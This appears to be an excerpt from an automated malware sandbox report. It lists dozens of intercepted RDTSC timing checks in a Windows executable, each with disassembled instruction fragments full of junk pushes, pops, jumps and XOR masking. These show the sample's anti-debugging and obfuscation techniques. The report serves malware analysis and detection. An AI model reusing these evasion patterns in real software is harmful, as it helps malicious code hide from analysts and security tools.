Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B418 second address: 126B41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126B41C second address: 10F1B76 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849C4F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 7F30098Ah 0x00000013 mov edx, dword ptr [ebp+122D2C60h] 0x00000019 push dword ptr [ebp+122D105Dh] 0x0000001f mov edx, dword ptr [ebp+122D1AFDh] 0x00000025 call dword ptr [ebp+122D2301h] 0x0000002b pushad 0x0000002c stc 0x0000002d cld 0x0000002e xor eax, eax 0x00000030 jmp 00007F849C4F2DA2h 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 sub dword ptr [ebp+122D1BB9h], edx 0x0000003f cld 0x00000040 mov dword ptr [ebp+122D2D3Ch], eax 0x00000046 pushad 0x00000047 jns 00007F849C4F2D96h 0x0000004d movsx eax, si 0x00000050 popad 0x00000051 mov esi, 0000003Ch 0x00000056 jmp 00007F849C4F2D9Ah 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f add dword ptr [ebp+122D1BFFh], edx 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D1BF9h], edi 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007F849C4F2D9Fh 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b mov dword ptr [ebp+122D1988h], ecx 0x00000081 movzx ebx, dx 0x00000084 popad 0x00000085 sub dword ptr [ebp+122D1BB9h], ebx 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f push edx 0x00000090 pop edx 0x00000091 push eax 0x00000092 pop eax 0x00000093 popad 0x00000094 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B49B second address: 126B4C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F849CDA41FFh 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B4C2 second address: 126B4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B4C6 second address: 126B52B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F849CD25978h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jng 00007F849CD25982h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jnl 00007F849CD25976h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 pop edx 0x0000002a popad 0x0000002b pop eax 0x0000002c mov edi, dword ptr [ebp+122D2C60h] 0x00000032 push 00000003h 0x00000034 mov dword ptr [ebp+122D28E2h], edx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D1BF1h], edx 0x00000042 push 00000003h 0x00000044 mov dword ptr [ebp+122D1C6Eh], esi 0x0000004a push DFC3D4F4h 0x0000004f jo 00007F849CD25984h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B52B second address: 126B52F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B58B second address: 126B5D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F849CD25978h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov di, 3C6Eh 0x00000028 adc di, FBABh 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D1AE3h], ebx 0x00000035 call 00007F849CD25979h 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e pop edi 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B5D7 second address: 126B6E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F849CD73E58h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F849CD73E64h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b jmp 00007F849CD73E5Bh 0x00000020 jno 00007F849CD73E5Ch 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 pushad 0x0000002a push esi 0x0000002b pushad 0x0000002c popad 0x0000002d pop esi 0x0000002e jno 00007F849CD73E66h 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 pushad 0x0000003a push esi 0x0000003b pushad 0x0000003c popad 0x0000003d pop esi 0x0000003e ja 00007F849CD73E5Ch 0x00000044 popad 0x00000045 pop eax 0x00000046 movzx edx, dx 0x00000049 push 00000003h 0x0000004b call 00007F849CD73E65h 0x00000050 je 00007F849CD73E5Ch 0x00000056 mov dword ptr [ebp+122D2A34h], edi 0x0000005c pop edx 0x0000005d and edi, dword ptr [ebp+122D2D60h] 0x00000063 push 00000000h 0x00000065 call 00007F849CD73E64h 0x0000006a mov dword ptr [ebp+122D17F2h], edi 0x00000070 pop esi 0x00000071 push 00000003h 0x00000073 and ecx, 65F7D520h 0x00000079 call 00007F849CD73E59h 0x0000007e jnc 00007F849CD73E6Bh 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F849CD73E5Eh 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B6E7 second address: 126B6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289FBB second address: 1289FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CD73E5Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F849CD73E56h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289FD7 second address: 1289FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CD25983h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A3D9 second address: 128A3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A3E2 second address: 128A3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7BD second address: 128A7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7C3 second address: 128A7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F849CD25976h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7D4 second address: 128A7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CD73E5Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7E4 second address: 128A7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7E8 second address: 128A7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7EC second address: 128A801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F849CD2597Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A801 second address: 128A83F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E63h 0x00000007 jmp 00007F849CD73E66h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F849CD73E56h 0x00000019 js 00007F849CD73E56h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A83F second address: 128A848 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F099 second address: 127F09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F09D second address: 127F0D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD25980h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F849CD25976h 0x00000013 jmp 00007F849CD25985h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F0D0 second address: 127F0E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CD73E56h 0x00000008 jne 00007F849CD73E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F0E5 second address: 127F0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F849CD25980h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255E9A second address: 1255EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EA0 second address: 1255EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EA6 second address: 1255EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F849CD73E66h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EC5 second address: 1255EDB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F849CD25976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F849CD25976h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EDB second address: 1255EF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F849CD73E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007F849CD73E56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EF0 second address: 1255EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F849CD25976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B54E second address: 128B554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B554 second address: 128B560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F849CD25978h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B7F1 second address: 128B833 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F849CD73E6Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F849CD73E60h 0x00000012 jmp 00007F849CD73E5Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B833 second address: 128B85B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CD25980h 0x00000008 jmp 00007F849CD25983h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BC77 second address: 128BC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F849CD73E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BC81 second address: 128BC89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BC89 second address: 128BCA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D59 second address: 1290D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jo 00007F849CD25994h 0x0000000c jc 00007F849CD2597Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D6D second address: 1290D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D78 second address: 1290D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292355 second address: 1292359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E365 second address: 125E36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E36F second address: 125E373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E373 second address: 125E37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1297DEF second address: 1297DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129823E second address: 1298272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD25981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F849CD25978h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 jmp 00007F849CD2597Eh 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129851A second address: 129851E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129851E second address: 129853C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F849CD25984h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12986A0 second address: 12986A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12986A4 second address: 12986B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD2597Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12987DF second address: 12987E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12987E5 second address: 12987FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F849CD2597Bh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A82E second address: 129A849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F849CD73E60h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AD83 second address: 129AD89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AD89 second address: 129AD8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B5CA second address: 129B5E7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849CD25976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F849CD25981h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B6B8 second address: 129B6D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B77F second address: 129B784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B8D9 second address: 129B8E3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F849CD73E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B8E3 second address: 129B8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BC56 second address: 129BC6D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F849CD73E58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F849CD73E56h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BC6D second address: 129BC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BC73 second address: 129BCA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+1244C794h] 0x00000011 xchg eax, ebx 0x00000012 push edx 0x00000013 jmp 00007F849CD73E60h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jnl 00007F849CD73E56h 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BCA4 second address: 129BCB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CD2597Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D0D1 second address: 129D0E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F849CD73E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D0E3 second address: 129D0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D70B second address: 129D75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F849CD73E65h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D2EAAh], edx 0x00000014 push edi 0x00000015 call 00007F849CD73E5Ah 0x0000001a mov dword ptr [ebp+122D1AE3h], ebx 0x00000020 pop edi 0x00000021 pop edi 0x00000022 push 00000000h 0x00000024 and esi, dword ptr [ebp+122D2E8Ch] 0x0000002a push 00000000h 0x0000002c xor dword ptr [ebp+1244C7C7h], edi 0x00000032 xchg eax, ebx 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 js 00007F849CD73E56h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D75C second address: 129D760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D760 second address: 129D771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 jo 00007F849CD73E5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E1F5 second address: 129E23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+1244C7C2h], edx 0x0000000f push 00000000h 0x00000011 add esi, 7A52F5A3h 0x00000017 push 00000000h 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jmp 00007F849CD25983h 0x00000020 jg 00007F849CD25978h 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a je 00007F849CD25980h 0x00000030 jmp 00007F849CD2597Ah 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129FA60 second address: 129FA64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0792 second address: 12A0796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0796 second address: 12A07A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A07A2 second address: 12A07B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CD2597Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A11B3 second address: 12A11B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0F99 second address: 12A0FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F849CD25982h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D58BB second address: 12D58D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849CDA41FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F849CDA41F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5A2A second address: 12D5A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5A2E second address: 12D5A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F849CDA4204h 0x0000000c rdtsc
